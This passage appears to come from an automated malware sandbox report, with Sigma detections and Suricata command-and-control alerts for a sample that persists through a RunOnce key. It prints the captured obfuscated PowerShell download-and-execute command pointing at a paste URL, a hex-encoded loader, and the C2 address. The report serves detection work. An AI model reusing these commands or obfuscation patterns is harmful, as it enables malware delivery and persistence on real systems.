E11C37187542FAF44694BA243E75
                    Sigma detected: CurrentVersion Autorun Keys Modification
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\faggbgb\AutoIt3.exe" C:\faggbgb\ggkfcbc.a3x, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\33260509\updater.exe, ProcessId: 2668, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ggkfcbc
                    Sigma detected: Usage Of Web Request Commands And Cmdlets
                    Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command cd;Set-Variable t8 (.(Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'*Cm*t'}).Name).Invoke((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'G*om*e'}).Name).Invoke('Ne*ct',$TRUE,1))Net.WebClient);SV s 'https://nopaste.net/SFHgtxFGtB';&(Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'*Cm*t'}).Name).Invoke((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'G*om*e'}).Name).Invoke('In*-Ex*ion',$TRUE,$TRUE))([String]::Join('',(((Get-Item Variable:\t8).Value.((((Get-Item Variable:\t8).Value|Get-Member)|Where-Object{(Get-Variable _).Value.Name-ilike'*nl*a'}).Name).Invoke((GCI Variable:\s).Value)|ForEach{(Get-Item Variable:/_).Value-As'Char'})))) , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command cd;Set-Variable t8 (.(Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'*Cm*t'}).Name).Invoke((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'G*om*e'}).Name).Invoke('Ne*ct',$TRUE,1))Net.WebClient);SV s 'https://nopaste.net/SFHgtxFGtB';&(Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'*Cm*t'}).Name).Invoke((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'G*om*e'}).Name).Invoke('In*-Ex*ion',$TRUE,$TRUE))([String]::Join('',(((Get-Item Variable:\t8).Value.((((Get-Item Variable:\t8).Value|Get-Member)|Where-Object{(Get-Variable _).Value.Name-ilike'*nl*a'}).Name).Invoke((GCI Variable:\s).Value)|ForEach{(Get-Item Variable:/_).Value-As'Char'})))) , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function CgMQB($seVe){return -split ($seVe -replace '..', '0x$& ')};$QBRr = CgMQB('619C354D6DB9F3F484D11E37F9A5C98CA2C67AD44869DAD2A1B050859A2F64301D2176E5E02553EC057B7DEFE97
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function CgMQB($seVe){return -split ($seVe -replace '..', '0x$& ')};$QBRr = CgMQB('619C354D6DB9F3F484D11E37F9A5C98CA2C67AD44869DAD2A1B050859A2F64301D2176E5E02553EC057B7DEFE977761F13EC3B821FD2BF7B61A2835F048AADB9D53EA5090C8A4909936162D4E888EDAE5C2805A7B7078C416E9EBA91A7737860E61CDA680064BEAC6C3B43D4A742CBC7650066B7009F6EED14E649BFE5141BC6820331279B1D91D1AFB9A002D60B1142E4BA80436C1ACBDF43F77D145A1AE776B79BBDC6B49934E8485CE19389F13ED554B250D9069CAAA26C8F20AFA47B2981F495265E62E718988B04FBEC2FAF9362FCCFC8295B4FF36FDF66DC47036B18CF402A773F7EB30CF918CC3523247BC946DD3C5116428886F846518591A5473C4029C6021C9D2E4DC7EC2B2F826CB99917AE10C1E8E375C6DD683272B3A957825DDC8CC3E570E90EAF546E09707A8515195EE8896646E1AC066E5BD2875F82393034B362AB91C9724851B205B4A02975E1B921526387AB1CCF8496B8225171653B45D000624D31EBB8A75E93A4FAEA1DA654CBBD9F01209D48530BDF0222A13A588A75E568B18065FA2534B0792938B38475ABE2BBFA3D79293144E35126501B0636B6C131B9A7E78357B3CAFD6D6FFBFB82F95F053407BD8B91DD016719170A36D88538050AE80A028D7C65871924A588285AB0798B124073A5337B6C7C9F6D791F852F957A88C51CDD5286C788EE800F41905A22D4F3C546EED053C37CA81FAC085A0604145517E387F89209637F36CBDFE3EFA22D81D023E26B486F415A9F60513E1F044BA938BA37A749A7D64E606F389CEA95EDE63FE4D4D0B5318E94946B345978B806EB97BAA7317F0D66441555CD8B0498CBCE4563F27417415532A59009F12D93486BAA576D66E1A94C2FCF0AFF4D97FF6AC0DED5AE9DD1C28BC9FB4B7B32EBAE00E90301C7B10FB256981821BA7D05E59142ED2B63DAF46E3F14731A7EE68FDA15C0ECB85076D5D3C1627FFECC12A8AB2AFA5DCFB028E118D7C7E65F6BDDCC94632D5131D101D2D1AD09C79DF3500ABC5CA72110F7FB629E9784A340DA2F69C7EF41790C7ECF578195A0226541AA005B9576C5DB3EC2D21E43AD093C6007DB20F96D752DDD4CB39BB4B44576D7DF95F0DD75240B1B45D12AD14DD1C62D252B89E4C3F6D7EA6DB64ACD483A82DB456666DDB4E66A704027AAC5243D0FEF1723B6BFBA2507B09B620E2E05AEBA95C5C15912F9762FE744C407625420E36C579137B8DA48E8B2B3D9CEB9EA7D17AF1140852299ADE0A8B44C9F5B84185E999DB924CA89E2381F4C206A8C9AA660F47B148421EB0BA7EBF85A7241C5492982E4137425C91BA9C5DFB91E9CE1808CD8F1A495DB03460FA132E80E1B3E0BE5A128F98183612928708BD201626624B297A12880537A327369FD4E4910DA3FD868CD9EBE5BD79C8442CE12C6C58D0B69BA72E4ED3EAF25028C786F3071CDD15675E2CDE5136736E09A963F3819A8E5CD1D162CFF51D8A4C10143B9819A2FB97A69508DAFC4323924544B31FF36BBAFC96F545ABECE3235E2FFA3205157DD1EBAE29CD05BAB7A53396ACB35F7F234057291F2FD7A472A2618EDC0995E36672AC725DE56E49AF3EDF3D49DABEB7C2E83CD39E4A1E4FD35C3AE52263B5EA0B9C94C447FBB37466E6EFC8913CDAE17BFFF7B13AE3DD38F2D855590BF0F8E86C627D41DF7AD14A562C3E7585030D97BC4B00D705840832C3E7A736A65B9A5DF8180343A6943D342BE79D729D85C9670DBBA11668A04D31F4257B8AC87E18DD94CACE14A949C27E6CCF7B24407AE865A3F706E6C802E46ACD0EE5590E5662C7F9E7F0F86445A3D9A74256659EB54C1EFAB0842363E035766605E44B0A632498B42DF7071A7BEE137394B4BE7714C9295A3BBCBC40ACF9EF837543FB9ABBBDA25577ADB9B87B50D5270E313C6D8E4F78F5E0A28F4AA66FC9FEFCF3EC4C1EF59EF0FDDE684CEE62FDCFB62D4EBA5E342E8B3007240FE11C37187542FAF44694BA243E75
                    Sigma detected: Potential Encoded PowerShell Patterns In CommandLine
                    Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function CgMQB($seVe){return -split ($seVe -replace '..', '0x$& ')};$QBRr = CgMQB('619C354D6DB9F3F484D11E37F9A5C98CA2C67AD44869DAD2A1B050859A2F64301D2176E5E02553EC057B7DEFE977761F13EC3B821FD2BF7B61A2835F048AADB9D53EA5090C8A4909936162D4E888EDAE5C2805A7B7078C416E9EBA91A7737860E61CDA680064BEAC6C3B43D4A742CBC7650066B7009F6EED14E649BFE5141BC6820331279B1D91D1AFB9A002D60B1142E4BA80436C1ACBDF43F77D145A1AE776B79BBDC6B49934E8485CE19389F13ED554B250D9069CAAA26C8F20AFA47B2981F495265E62E718988B04FBEC2FAF9362FCCFC8295B4FF36FDF66DC47036B18CF402A773F7EB30CF918CC3523247BC946DD3C5116428886F846518591A5473C4029C6021C9D2E4DC7EC2B2F826CB99917AE10C1E8E375C6DD683272B3A957825DDC8CC3E570E90EAF546E09707A8515195EE8896646E1AC066E5BD2875F82393034B362AB91C9724851B205B4A02975E1B921526387AB1CCF8496B8225171653B45D000624D31EBB8A75E93A4FAEA1DA654CBBD9F01209D48530BDF0222A13A588A75E568B18065FA2534B0792938B38475ABE2BBFA3D79293144E35126501B0636B6C131B9A7E78357B3CAFD6D6FFBFB82F95F053407BD8B91DD016719170A36D88538050AE80A028D7C65871924A588285AB0798B124073A5337B6C7C9F6D791F852F957A88C51CDD5286C788EE800F41905A22D4F3C546EED053C37CA81FAC085A0604145517E387F89209637F36CBDFE3EFA22D81D023E26B486F415A9F60513E1F044BA938BA37A749A7D64E606F389CEA95EDE63FE4D4D0B5318E94946B345978B806EB97BAA7317F0D66441555CD8B0498CBCE4563F27417415532A59009F12D93486BAA576D66E1A94C2FCF0AFF4D97FF6AC0DED5AE9DD1C28BC9FB4B7B32EBAE00E90301C7B10FB256981821BA7D05E59142ED2B63DAF46E3F14731A7EE68FDA15C0ECB85076D5D3C1627FFECC12A8AB2AFA5DCFB028E118D7C7E65F6BDDCC94632D5131D101D2D1AD09C79DF3500ABC5CA72110F7FB629E9784A340DA2F69C7EF41790C7ECF578195A0226541AA005B9576C5DB3EC2D21E43AD093C6007DB20F96D752DDD4CB39BB4B44576D7DF95F0DD75240B1B45D12AD14DD1C62D252B89E4C3F6D7EA6DB64ACD483A82DB456666DDB4E66A704027AAC5243D0FEF1723B6BFBA2507B09B620E2E05AEBA95C5C15912F9762FE744C407625420E36C579137B8DA48E8B2B3D9CEB9EA7D17AF1140852299ADE0A8B44C9F5B84185E999DB924CA89E2381F4C206A8C9AA660F47B148421EB0BA7EBF85A7241C5492982E4137425C91BA9C5DFB91E9CE1808CD8F1A495DB03460FA132E80E1B3E0BE5A128F98183612928708BD201626624B297A12880537A327369FD4E4910DA3FD868CD9EBE5BD79C8442CE12C6C58D0B69BA72E4ED3EAF25028C786F3071CDD15675E2CDE5136736E09A963F3819A8E5CD1D162CFF51D8A4C10143B9819A2FB97A69508DAFC4323924544B31FF36BBAFC96F545ABECE3235E2FFA3205157DD1EBAE29CD05BAB7A53396ACB35F7F234057291F2FD7A472A2618EDC0995E36672AC725DE56E49AF3EDF3D49DABEB7C2E83CD39E4A1E4FD35C3AE52263B5EA0B9C94C447FBB37466E6EFC8913CDAE17BFFF7B13AE3DD38F2D855590BF0F8E86C627D41DF7AD14A562C3E7585030D97BC4B00D705840832C3E7A736A65B9A5DF8180343A6943D342BE79D729D85C9670DBBA11668A04D31F4257B8AC87E18DD94CACE14A949C27E6CCF7B24407AE865A3F706E6C802E46ACD0EE5590E5662C7F9E7F0F86445A3D9A74256659EB54C1EFAB0842363E035766605E44B0A632498B42DF7071A7BEE137394B4BE7714C9295A3BBCBC40ACF9EF837543FB9ABBBDA25577ADB9B87B50D5270E313C6D8E4F78F5E0A28F4AA66FC9FEFCF3EC4C1EF59EF0FDDE684CEE62FDCFB62D4EBA5E342E8B3007240FE11C37187542FAF44694BA243E75

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-17T08:34:27.531614+010020292171Malware Command and Control Activity Detected185.147.124.23615647192.168.2.849735TCP
                    2024-12-17T08:35:42.321939+010020292171Malware Command and Control Activity Detected185.147.124.23615647192.168.2.849809TCP
                    2024-12-17T08:35:49.977329+010020292171Malware Command and Control Activity Detected185.147.124.23615647192.168.2.849817TCP
                    2024-12-17T08:35:51.231060+010020292171Malware Command and Control Activity Detected185.147.124.23615647192.168.2.849818TCP
                    2024-12-17T08:35:54.621191+010020292171Malware Command and Control Activity Detected185.147.124.23615647192.168.2.849822TCP
                    2024-12-17T08:36:01.598443+010020292171Malware Command and Control Activity Detected185.147.124.23615647192.168.2.849827TCP
                    2024-12-17T08:36:47.257157+010020292171Malware Command and Control Activity Detected185.147.124.23615647192.168.2.849858TCP
                    2024-12-17T08:36:48.514417+010020292171Malware Command and Control Activity Detected185.147.124.23615647192.168.2.849859TCP
                    2024-12-17T08:37:00.472691+010020292171Malware Command and Control Activity Detected185.147.124.23615647192.168.2.849868TCP
                    2024-12-17T08:37:08.995721+010020292171Malware Command and Control Activity Detected185.147.124.23615647192.168.2.849875TCP
                    2024-12-17T08:37:35.911109+010020292171Malware Command and Control Activity Detected185.147.124.23615647192.168.2.849893TCP
                    2024-12-17T08:37:47.434759+010020292171Malware Command and Control Activity Detected185.147.124.23615647192.168.2.849902TCP
                    2024-12-17T08:37:55.143020+010020292171Malware Command and Control Activity Detected185.147.124.23615647192.168.2.849908TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-17T08:34:26.332263+010020519101A Network Trojan was detected192.168.2.849735185.147.124.23615647TCP
                    2024-12-17T08:34:26.452075+010020519101A Network Trojan was detected192.168.2.849735185.147.124.23615647TCP
                    2024-12-17T08:34:26.572237+010020519101A Network Trojan was detected192.168.2.849735185.147.124.23615647TCP
                    2024-12-17T08:34:26.692095+010020519101A Network Trojan was detected192.168.2.849735185.147.124.23615647TCP
                    2024-12-17T08:34:26.812011+010020519101A Network Trojan was detected192.168.2.849735185.147.124.23615647TCP
                    2024-12-17T08:34:26.931930+010020519101A Network Trojan was detected192.168.2.849735185.147.124.23615647TCP
                    2024-12-17T08:34:27.051817+010020519101A Network Trojan was detected192.168.2.849735185.147.124.23615647TCP
                    2024-12-17T08:34:27.171725+010020519101A Network Trojan was detected192.168.2.849735185.147.124.23615647TCP
                    2024-12-17T08:34:27.293914+010020519101A Network Trojan was detected192.168.2.849735185.147.124.23615647TCP
                    2024-12-17T08:34:27.413711+010020519101A Network Trojan was detected192.168.2.849735185.147.124.23615647TCP
                    2024-12-17T08:34:27.531821+010020519101A Network Trojan was detected192.168.2.849735185.147.124.23615647TCP
                    2024-12-17T08:34:27.651598+010020519101A Network Trojan was detected192.168.2.849735185.147.124.23615647TCP
                    2024-12-17T08:34:27.915695+010020519101A Network Trojan was detected192.168.2.849735185.147.124.23615647TCP
                    2024-12-17T08:34:28.213533+010020519101A Network Trojan was detected192.168.2.849735185.147.124.23615647TCP
                    2024-12-17T08:34:28.406108+010020519101A Network Trojan was detected192.168.2.849735185.147.124.23615647TCP
                    2024-12-17T08:34:28.526097+010020519101A Network Trojan was detected192.168.2.849735185.147.124.23615647TCP
                    2024-12-17T08:35:41.125605+010020519101A Network Trojan was detected192.168.2.849809185.147.124.23615647TCP
                    2024-12-17T08:35:47.910346+010020519101A Network Trojan was detected192.168.2.849815185.147.124.23615647TCP
                    2024-12-17T08:35:48.783751+010020519101A Network Trojan was detected192.168.2.849817185.147.124.23615647TCP
                    2024-12-17T08:35:50.003699+010020519101A Network Trojan was detected192.168.2.849818185.147.124.23615647TCP
                    2024-12-17T08:35:53.426088+010020519101A Network Trojan was detected192.168.2.849822185.147.124.23615647TCP
                    2024-12-17T08:36:00.400537+010020519101A Network Trojan was detected192.168.2.849827185.147.124.23615647TCP
                    2024-12-17T08:36:00.643477+010020519101A Network Trojan was detected192.168.2.849827185.147.124.23615647TCP
                    2024-12-17T08:36:00.781582+010020519101A Network Trojan was detected192.168.2.849827185.147.124.23615647TCP
                    2024-12-17T08:36:46.063821+010020519101A Network Trojan was detected192.168.2.849858185.147.124.23615647TCP
                    2024-12-17T08:36:46.202010+010020519101A Network Trojan was detected192.168.2.849858185.147.124.23615647TCP
                    2024-12-17T08:36:46.274225+010020519101A Network Trojan was detected192.168.2.849858185.147.124.23615647TCP
                    2024-12-17T08:36:46.382068+010020519101A Network Trojan was detected192.168.2.849858185.147.124.23615647TCP
                    2024-12-17T08:36:47.125167+010020519101A Network Trojan was detected192.168.2.849858185.147.124.23615647TCP
                    2024-12-17T08:36:47.318495+010020519101A Network Trojan was detected192.168.2.849859185.147.124.23615647TCP
                    2024-12-17T08:36:48.383149+010020519101A Network Trojan was detected192.168.2.849859185.147.124.23615647TCP
                    2024-12-17T08:36:48.438898+010020519101A Network Trojan was detected192.168.2.849859185.147.124.23615647TCP
                    2024-12-17T08:36:59.280615+010020519101A Network Trojan was detected192.168.2.849868185.147.124.23615647TCP
                    2024-12-17T08:36:59.510389+010020519101A Network Trojan was detected192.168.2.849868185.147.124.23615647TCP
                    2024-12-17T08:36:59.549314+010020519101A Network Trojan was detected192.168.2.849868185.147.124.23615647TCP
                    2024-12-17T08:36:59.616388+010020519101A Network Trojan was detected192.168.2.849868185.147.124.23615647TCP
                    2024-12-17T08:37:00.357474+010020519101A Network Trojan was detected192.168.2.849868185.147.124.23615647TCP
                    2024-12-17T08:37:07.791734+010020519101A Network Trojan was detected192.168.2.849875185.147.124.23615647TCP
                    2024-12-17T08:37:07.981724+010020519101A Network Trojan was detected192.168.2.849875185.147.124.23615647TCP
                    2024-12-17T08:37:34.674136+010020519101A Network Trojan was detected192.168.2.849893185.147.124.23615647TCP
                    2024-12-17T08:37:34.869558+010020519101A Network Trojan was detected192.168.2.849893185.147.124.23615647TCP
                    2024-12-17T08:37:34.989599+010020519101A Network Trojan was detected192.168.2.849893185.147.124.23615647TCP
                    2024-12-17T08:37:35.006163+010020519101A Network Trojan was detected192.168.2.849893185.147.124.23615647TCP
                    2024-12-17T08:37:35.719705+010020519101A Network Trojan was detected192.168.2.849893185.147.124.23615647TCP
                    2024-12-17T08:37:44.447899+010020519101A Network Trojan was detected192.168.2.849900185.147.124.23615647TCP
                    2024-12-17T08:37:44.746311+010020519101A Network Trojan was detected192.168.2.849900185.147.124.23615647TCP
                    2024-12-17T08:37:45.695619+010020519101A Network Trojan was detected192.168.2.849900185.147.124.23615647TCP
                    2024-12-17T08:37:45.863270+010020519101A Network Trojan was detected192.168.2.849900185.147.124.23615647TCP
                    2024-12-17T08:37:46.239654+010020519101A Network Trojan was detected192.168.2.849902185.147.124.23615647TCP
                    2024-12-17T08:37:46.387503+010020519101A Network Trojan was detected192.168.2.849902185.147.124.23615647TCP
                    2024-12-17T08:37:46.599248+010020519101A Network Trojan was detected192.168.2.849902185.147.124.23615647TCP
                    2024-12-17T08:37:47.334286+010020519101A Network Trojan was detected192.168.2.849902185.147.124.23615647TCP
                    2024-12-17T08:37:47.362557+010020519101A Network Trojan was detected192.168.2.849902185.147.124.23615647TCP
                    2024-12-17T08:37:53.951882+010020519101A Network Trojan was detected192.168.2.849908185.147.124.23615647TCP
                    2024-12-17T08:37:54.122571+010020519101A Network Trojan was detected192.168.2.849908185.147.124.23615647TCP
                    2024-12-17T08:37:57.709658+010020519101A Network Trojan was detected192.168.2.849908185.147.124.23615647TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-17T08:34:31.616241+010020522481A Network Trojan was detected192.168.2.849737185.147.124.2369000TCP
                    2024-12-17T08:34:33.156317+010020522481A Network Trojan was detected192.168.2.849739185.147.124.2369000TCP
                    2024-12-17T08:34:34.693775+010020522481A Network Trojan was detected192.168.2.849740185.147.124.2369000TCP
                    2024-12-17T08:34:36.242251+010020522481A Network Trojan was detected192.168.2.849742185.147.124.2369000TCP
                    2024-12-17T08:34:37.823274+010020522481A Network Trojan was detected192.168.2.849743185.147.124.2369000TCP
                    2024-12-17T08:34:39.357777+010020522481A Network Trojan was detected192.168.2.849745185.147.124.2369000TCP
                    2024-12-17T08:34:40.895697+010020522481A Network Trojan was detected192.168.2.849746185.147.124.2369000TCP
                    2024-12-17T08:34:42.430216+010020522481A Network Trojan was detected192.168.2.849748185.147.124.2369000TCP
                    2024-12-17T08:34:44.175677+010020522481A Network Trojan was detected192.168.2.849749185.147.124.2369000TCP
                    2024-12-17T08:34:45.718296+010020522481A Network Trojan was detected192.168.2.849751185.147.124.2369000TCP
                    2024-12-17T08:34:47.449835+010020522481A Network Trojan was detected192.168.2.849753185.147.124.2369000TCP
                    2024-12-17T08:34:48.984297+010020522481A Network Trojan was detected192.168.2.849754185.147.124.2369000TCP
                    2024-12-17T08:34:50.547762+010020522481A Network Trojan was detected192.168.2.849756185.147.124.2369000TCP
                    2024-12-17T08:34:52.094405+010020522481A Network Trojan was detected192.168.2.849757185.147.124.2369000TCP
                    2024-12-17T08:34:53.631234+010020522481A Network Trojan was detected192.168.2.849760185.147.124.2369000TCP
                    2024-12-17T08:34:55.171539+010020522481A Network Trojan was detected192.168.2.849761185.147.124.2369000TCP
                    2024-12-17T08:34:56.718492+010020522481A Network Trojan was detected192.168.2.849763185.147.124.2369000TCP
                    2024-12-17T08:34:58.333058+010020522481A Network Trojan was detected192.168.2.849765185.147.124.2369000TCP
                    2024-12-17T08:34:59.874885+010020522481A Network Trojan was detected192.168.2.849766185.147.124.2369000TCP
                    2024-12-17T08:35:01.421903+010020522481A Network Trojan was detected192.168.2.849768185.147.124.2369000TCP
                    2024-12-17T08:35:02.965695+010020522481A Network Trojan was detected192.168.2.849769185.147.124.2369000TCP
                    2024-12-17T08:35:04.520296+010020522481A Network Trojan was detected192.168.2.849771185.147.124.2369000TCP
                    2024-12-17T08:35:06.114616+010020522481A Network Trojan was detected192.168.2.849772185.147.124.2369000TCP
                    2024-12-17T08:35:07.733262+010020522481A Network Trojan was detected192.168.2.849774185.147.124.2369000TCP
                    2024-12-17T08:35:09.517317+010020522481A Network Trojan was detected192.168.2.849775185.147.124.2369000TCP
                    2024-12-17T08:35:11.057102+010020522481A Network Trojan was detected192.168.2.849777185.147.124.2369000TCP
                    2024-12-17T08:35:12.598812+010020522481A Network Trojan was detected192.168.2.849779185.147.124.2369000TCP
                    2024-12-17T08:35:14.130925+010020522481A Network Trojan was detected192.168.2.849780185.147.124.2369000TCP
                    2024-12-17T08:35:15.662917+010020522481A Network Trojan was detected192.168.2.849782185.147.124.2369000TCP
                    2024-12-17T08:35:17.216690+010020522481A Network Trojan was detected192.168.2.849783185.147.124.2369000TCP
                    2024-12-17T08:35:18.796602+010020522481A Network Trojan was detected192.168.2.849785185.147.124.2369000TCP
                    2024-12-17T08:35:20.394494+010020522481A Network Trojan was detected192.168.2.849786185.147.124.2369000TCP
                    2024-12-17T08:35:21.934528+010020522481A Network Trojan was detected192.168.2.849788185.147.124.2369000TCP
                    2024-12-17T08:35:23.461759+010020522481A Network Trojan was detected192.168.2.849789185.147.124.2369000TCP
                    2024-12-17T08:35:24.995945+010020522481A Network Trojan was detected192.168.2.849791185.147.124.2369000TCP
                    2024-12-17T08:35:26.523285+010020522481A Network Trojan was detected192.168.2.849793185.147.124.2369000TCP
                    2024-12-17T08:35:28.066286+010020522481A Network Trojan was detected192.168.2.849794185.147.124.2369000TCP
                    2024-12-17T08:35:29.598357+010020522481A Network Trojan was detected192.168.2.849796185.147.124.2369000TCP
                    2024-12-17T08:35:31.147885+010020522481A Network Trojan was detected192.168.2.849797185.147.124.2369000TCP
                    2024-12-17T08:35:32.686688+010020522481A Network Trojan was detected192.168.2.849799185.147.124.2369000TCP
                    2024-12-17T08:35:34.235163+010020522481A Network Trojan was detected192.168.2.849800185.147.124.2369000TCP
                    2024-12-17T08:35:35.775558+010020522481A Network Trojan was detected192.168.2.849802185.147.124.2369000TCP
                    2024-12-17T08:35:37.358023+010020522481A Network Trojan was detected192.168.2.849803185.147.124.2369000TCP
                    2024-12-17T08:35:38.941928+010020522481A Network Trojan was detected192.168.2.849805185.147.124.2369000TCP
                    2024-12-17T08:35:40.487364+010020522481A Network Trojan was detected192.168.2.849807185.147.124.2369000TCP
                    2024-12-17T08:35:42.031235+010020522481A Network Trojan was detected192.168.2.849808185.147.124.2369000TCP
                    2024-12-17T08:35:43.584737+010020522481A Network Trojan was detected192.168.2.849811185.147.124.2369000TCP
                    2024-12-17T08:35:45.115542+010020522481A Network Trojan was detected192.168.2.849812185.147.124.2369000TCP
                    2024-12-17T08:35:46.691067+010020522481A Network Trojan was detected192.168.2.849813185.147.124.2369000TCP
                    2024-12-17T08:35:48.236074+010020522481A Network Trojan was detected192.168.2.849814185.147.124.2369000TCP
                    2024-12-17T08:35:49.874820+010020522481A Network Trojan was detected192.168.2.849816185.147.124.2369000TCP
                    2024-12-17T08:35:51.534051+010020522481A Network Trojan was detected192.168.2.849819185.147.124.2369000TCP
                    2024-12-17T08:35:53.074335+010020522481A Network Trojan was detected192.168.2.849820185.147.124.2369000TCP
                    2024-12-17T08:35:54.619267+010020522481A Network Trojan was detected192.168.2.849821185.147.124.2369000TCP
                    2024-12-17T08:35:56.162527+010020522481A Network Trojan was detected192.168.2.849823185.147.124.2369000TCP
                    2024-12-17T08:35:57.718723+010020522481A Network Trojan was detected192.168.2.849824185.147.124.2369000TCP
                    2024-12-17T08:35:59.301165+010020522481A Network Trojan was detected192.168.2.849825185.147.124.2369000TCP
                    2024-12-17T08:36:00.896918+010020522481A Network Trojan was detected192.168.2.849826185.147.124.2369000TCP
                    2024-12-17T08:36:02.428760+010020522481A Network Trojan was detected192.168.2.849828185.147.124.2369000TCP
                    2024-12-17T08:36:03.969646+010020522481A Network Trojan was detected192.168.2.849829185.147.124.2369000TCP
                    2024-12-17T08:36:05.507052+010020522481A Network Trojan was detected192.168.2.849830185.147.124.2369000TCP
                    2024-12-17T08:36:07.047441+010020522481A Network Trojan was detected192.168.2.849831185.147.124.2369000TCP
                    2024-12-17T08:36:08.583865+010020522481A Network Trojan was detected192.168.2.849832185.147.124.2369000TCP
                    2024-12-17T08:36:10.126120+010020522481A Network Trojan was detected192.168.2.849833185.147.124.2369000TCP
                    2024-12-17T08:36:11.672076+010020522481A Network Trojan was detected192.168.2.849834185.147.124.2369000TCP
                    2024-12-17T08:36:13.219745+010020522481A Network Trojan was detected192.168.2.849835185.147.124.2369000TCP
                    2024-12-17T08:36:14.777800+010020522481A Network Trojan was detected192.168.2.849836185.147.124.2369000TCP
                    2024-12-17T08:36:16.306261+010020522481A Network Trojan was detected192.168.2.849837185.147.124.2369000TCP
                    2024-12-17T08:36:17.854514+010020522481A Network Trojan was detected192.168.2.849838185.147.124.2369000TCP
                    2024-12-17T08:36:19.384385+010020522481A Network Trojan was detected192.168.2.849839185.147.124.2369000TCP
                    2024-12-17T08:36:20.914576+010020522481A Network Trojan was detected192.168.2.849840185.147.124.2369000TCP
                    2024-12-17T08:36:22.444819+010020522481A Network Trojan was detected192.168.2.849841185.147.124.2369000TCP
                    2024-12-17T08:36:23.975428+010020522481A Network Trojan was detected192.168.2.849842185.147.124.2369000TCP
                    2024-12-17T08:36:25.507128+010020522481A Network Trojan was detected192.168.2.849843185.147.124.2369000TCP
                    2024-12-17T08:36:27.036685+010020522481A Network Trojan was detected192.168.2.849844185.147.124.2369000TCP
                    2024-12-17T08:36:28.578397+010020522481A Network Trojan was detected192.168.2.849845185.147.124.2369000TCP
                    2024-12-17T08:36:30.118416+010020522481A Network Trojan was detected192.168.2.849846185.147.124.2369000TCP
                    2024-12-17T08:36:31.655489+010020522481A Network Trojan was detected192.168.2.849847185.147.124.2369000TCP
                    2024-12-17T08:36:33.274481+010020522481A Network Trojan was detected192.168.2.849848185.147.124.2369000TCP
                    2024-12-17T08:36:34.803845+010020522481A Network Trojan was detected192.168.2.849849185.147.124.2369000TCP
                    2024-12-17T08:36:36.381301+010020522481A Network Trojan was detected192.168.2.849850185.147.124.2369000TCP
                    2024-12-17T08:36:37.914056+010020522481A Network Trojan was detected192.168.2.849851185.147.124.2369000TCP
                    2024-12-17T08:36:39.454998+010020522481A Network Trojan was detected192.168.2.849852185.147.124.2369000TCP
                    2024-12-17T08:36:40.992511+010020522481A Network Trojan was detected192.168.2.849853185.147.124.2369000TCP
                    2024-12-17T08:36:42.523013+010020522481A Network Trojan was detected192.168.2.849854185.147.124.2369000TCP
                    2024-12-17T08:36:44.130874+010020522481A Network Trojan was detected192.168.2.849855185.147.124.2369000TCP
                    2024-12-17T08:36:45.675598+010020522481A Network Trojan was detected192.168.2.849856185.147.124.2369000TCP
                    2024-12-17T08:36:47.207745+010020522481A Network Trojan was detected192.168.2.849857185.147.124.2369000TCP
                    2024-12-17T08:36:48.930976+010020522481A Network Trojan was detected192.168.2.849860185.147.124.2369000TCP
                    2024-12-17T08:36:50.459046+010020522481A Network Trojan was detected192.168.2.849861185.147.124.2369000TCP
                    2024-12-17T08:36:51.992057+010020522481A Network Trojan was detected192.168.2.849862185.147.124.2369000TCP
